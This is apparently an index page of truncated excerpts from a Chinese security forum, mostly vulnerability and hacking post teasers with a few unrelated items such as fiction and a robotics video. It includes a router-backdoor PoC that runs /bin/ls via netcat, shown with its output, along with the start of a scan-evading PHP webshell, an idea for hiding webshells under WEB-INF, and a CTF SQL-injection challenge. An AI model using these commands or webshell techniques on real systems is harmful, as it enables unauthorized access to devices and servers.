我决定还是由我自己来发这个微电影吧，自从拍了这个电影后，我在全国人民面前都抬不起头了，抓狂+崩溃。之前看到此电影的人大笑我转混娱乐圈，在这里

我的思路是先从远程读取要生成的shell内容，然后把shell藏在WEB-INF下shell的名字和长度也都随机生成。比如： 不过就算藏在WE

英文原文：WordPress 3.5.1, Denial of Service [UPDATE] 中文译文：Wordpress 3.4 - 3.5.1 逻辑问题导致的 DoS 最终产生 DoS 效果的代码在通用组件phpass中，wp 中

英文原文：WordPress 3.5.1, Denial of Service [UPDATE] 中文译文：Wordpress 3.4 - 3.5.1 逻辑问题导致的 DoS Because I haven't been pasting any new notes for few months, here is one of the bugs I've found in newest release of WordPress (version 3.5.1).

最近的路由器漏洞有点火啊。。。 蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-10-23 21:47 最近的路由器漏洞爆了两个出来，并且用户量也极大。。 。。。so

HWP注释功能存在一个堆溢出，是因为长度变量经过计算后整数溢出，分配小内存拷贝大数据。 HWP是棒子用的WORD软件，懂的就懂了，不要问我怎么

目录 0x00:基本介绍 0x01:html实体编码 0x02:新增的实体编码 实体编码变异以及浏览器的某些工作原理！ 0x03:javascript

前言：by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法，这种方法只能导小型域控（几

视频: M-Blocks Modular Robots youtube.com/watch?v=mOqjFa4RskA These proof-of-concept robots are the first step in a project that will hopefully lead to the development of modular robot blocks that are cable of generic lattice-based self-reconfiguration. This current generation of robots is limited to being able to "roll" in only one direction per cube. Future work will hopefully add the ability for a single robot to move in all three planes.

无聊拿了几个phpddos的脚本 破落日 | 2013-10-20 00:10 起初是在群里看到这张图 看到这么多shell不明觉厉啊 谷歌了一下,发现这个 看样子应该是前段时间批量

同一个网站爆的，只需发送一个udp包，围观地址： http://www.devttys0.com/2013/10/from-china-with-love/ poc $ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329 drwxr-xr-x 2 0 0 1363 webroot drwxr-xr-x 1 0 0 0 var drwxr-xr-x 5 0 0 43 usr drwxr-xr-x 1 0 0 0 tmp drwxr-xr-x 2 0 0 3 sys drwxr-xr-x 2 0

from:https://www.corelan.be/index.php/2013/10/04/zabbix-sql-injectionrce-cve-2013-5743/ 0x00 背景 该漏洞于2013年9月11号提交，9月23号得到确认，10月2号发布补丁。 新出的0day，可以通过sql注入直接进入后台，并执行系统

challenge 1 php code： #GOAL: get password from admin; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $str=stripslashes($str); } return htmlentities($str, ENT_QUOTES); } $username = @clean((string)$_GET['username']); $password = @clean((string)$_GET['password']); $query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'; $result=mysql_query($query); if(!$result || mysql_num_rows($result) < 1){ die('Invalid password!'); } $row = mysql_fetch_assoc($result); echo "Hello ".$row['name']."</br>"; echo "Your password is:".$row['pass']."</br>"; 攻略： 在单引号内的mys

0x00 关于CentOS+Base+Barnyard2+Suricata就不多说了，这里有文章已经写的很详细了。 请参考：CentOS 6.2下安装基

近来收到一封邮件试图钓我所在大学的大学帐号密码的邮件....思考了一会儿...想到了一个反制思路 钓鱼邮件如图，学校名已和谐... 考虑如何反制

从丝绸之路到安全运维（Operational Security）与风险控制（Risk Management） 上集 0x00 背景 2013年10月2日，在大

大家好，我们是开源CDN团队，专注于CDN技术的开发和研究。 首先，为了对CDN进行攻击，我们必须清楚CDN的工作原理，这里我们再来简单介绍一

其实已经不是一句话了，好几句了都。 继续上次的：我使用的一句话的几种姿态 这回研究了下PHP，发一下我使用的一句话（可过文件扫描）。 <?php $mujj = $_POST['z']; if ($mujj!="")

就是所谓的淘宝冲4钻+会员之类的 全部冲一年也只要120 写的还可以冲永久 而且都是很便宜的价格 当你联系这家客服的时候 他会毫不犹豫的发给你一个支付

在 dlink 的升级包 firmware v1.13中，作者下载放入IDA中分析，发现了异样， 接着查看了带有“alpha”字串的自定义函数： alpha_auth_che

All right. It’s Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape…let’s hack. On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware’s

宰相露出邪恶的笑容，坐在沙发上悠哉悠哉的抽着烟望着我。 “历史上还没有谁能直接让一个国家的互联网沦陷！更别说我们这群只在应用层的人！” “这是你

车子在公路上疾驰,一路上我跟宰相很少交流,他放由我自己去感受这座城市.车窗外尽是四通八达的高架,川流不息的车流,巍峨耸立的高楼大厦,五彩缤纷

2012年7月中旬，我坐上了开往深圳的长途汽车，那天下着小雨，此时的心情久久不能平静，望着窗外想着事情。 “唉”叹了口气，“再相信这个社会一次

人类平均寿命为60年，有一半人用了30年睡觉，也就剩下30年，而在这30年中，16岁成年，也就意味着只有14年是真正的活着 这14年中从懵懂到

俺在国外当会棍 -- WIFI 篇 Kevin2600 (Just Hacking it!!!) | 2013-10-12 16:26 这是大会的WIFI 网, 大家看到最后一句时, 都默默地拿出了设备 ...Do not attempt to hack it...请不要hack 大会wifi

讨论下快捷支付存在的风险 jeary (?????????????????????????) | 2013-10-12 09:51 由于没有网银，所以用的快捷支付，是挺方便的。可是当我仔细想想开通的流程，然后惊呆了，寝食难安了。 绑定条件 1

我这个穷匕早就对网赚失望了，前几天还有人要带我，赚钱的谁会舔着脸去找你。 上图吧，这个目测能骗不少人。 收到教程，就是一个安装软件，反正就是要给

今天提权，其他命令可以执行，唯独net user无法执行，也没想到是安全狗，一直以为是net.exe被删除了，后来自己试了半天，终于提权了，进

严重警告： 本文内容纯属业余恶搞娱乐，不牵扯任何敏感话题，文章内容真实性无从考证！本站并不赞同文中任何观点；如果读者私自非法传播、转载或进行任